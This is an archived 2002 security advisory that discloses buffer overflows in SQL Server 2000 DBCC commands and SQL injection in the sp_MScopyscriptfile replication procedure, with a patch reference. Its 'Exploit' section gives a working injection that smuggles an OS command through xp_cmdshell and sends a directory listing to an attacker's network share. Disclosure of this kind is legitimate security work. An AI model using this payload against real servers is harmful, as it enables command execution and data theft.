OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: c c (cesarc56_at_UOL.COM.AR)
Date: Thu Jul 25 2002 - 15:50:00 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Security Advisory

    Name: SQL Server 2000 Buffer Overflows and SQL
    Inyection vulnerabilities.
    System Affected : Sql Server 2000 all Service Packs.
    Severity : High.
    Author: Cesar Cerrudo.
    Date: 07/25/2002
    Advisory Number: CC070205

    Overview:
    Database Consistency Checkers (DBCCs) are command
    console utilities that allow maintenance and other
    operations to be performed on a SQL Server, some of the
    DBCC functions are vulnerable to buffer overflows. The
    explotation of these vulnerabilities could enable an
    attacker to run code in the context of the SQL Server
    service.
    Some stored procedures used in database replication are
    vulnerable to SQL injection. The explotation of these
    vulnerabilities could enable an attacker to run OS
    commands with xp_cmdshell in the context of the SQL
    Server Agent Proxy account.

    Details:

    The following DBCC funcions contain unchecked buffers:
    DBCC ADDEXTENDEDPROC ('xp_storedproc','XXX...') (a)
    DBCC INDEXFRAG ('','XXX...') (b)
    DBCC UPDATEUSAGE ('','XXX...') (c)
    DBCC CHECKCONSTRAINTS ('XXX...') (c)
    DBCC SHOWCONTIG ('XXX...') (d)
    DBCC CLEANTABLE ('','XXX...') (d)
    (a) Only members of sysadmin fixed server role can run
    this command.
    (b) Only members of sysadmin fixed server role,
    db_owner or db_ddladmin fixed database role can run
    this command.
    (c) Only members of sysadmin fixed server role or
    db_owner fixed database role can run this command.
    (d) All users can run this command.
    The buffer overflow in DBCC ADDEXTENDEDPROC affects SQL
    Server 7.0 too.

    Sp_MScopyscriptfile stored procedure is one of several
    stored procedures (not mentioned here for time reasons)
    vulnerables to SQL Inyection. Sp_MScopyscriptfile
    create a directory in the SQL Server replication
    directory and then copy a script file into it. It has
    one input parameter scriptfile that is the name of the
    script file to be copied. In that parameter OS commands
    can be inyected and then executed by xp_cmdshell.

    ---Code snip of sp_MScopyscriptfile stored procedure
    where the inyection ocurrs---

    select cmd = N'copy "' + scriptfile + N'" "' +
    directory + N'"'
    exec retcode = master..xp_cmdshell cmd, NO_OUTPUT

    ----End code snip-----

    SQL Server Agent Proxy account must be enabled to
    succesfull exploit these SQL Inyection vulnerabilities
    and is not enabled by default.

    Exploit :

    declare command varchar(100)
    declare scripfile varchar(200)
    set concat_null_yields_null off
    select command='dir c:\ > "\\attackerip\share\dir.txt"'
    select scripfile='c:\autoexec.bat > nul" | ' +
    command + ' | rd "'
    exec sp_MScopyscriptfile scripfile ,''

    More Details:
    http://www.appsecinc.com/resources/alerts/mssql/02-
    0011.html

    Vendor Status :
    Microsoft was contacted, we work together and Microsoft
    release a fix.

    Patch Available :
    http://www.microsoft.com/technet/security/bulletin/MS02-
    038.asp

    Thanks!:
    Special thanks to Aaron Newman (Application Security,
    Inc.) for his
    collaboration in testing.

    _________________________________________________________________
    UOLMAIL - Todo Argentino tiene derecho a lo mejor de Internet.
    http://www.uolmail.com.ar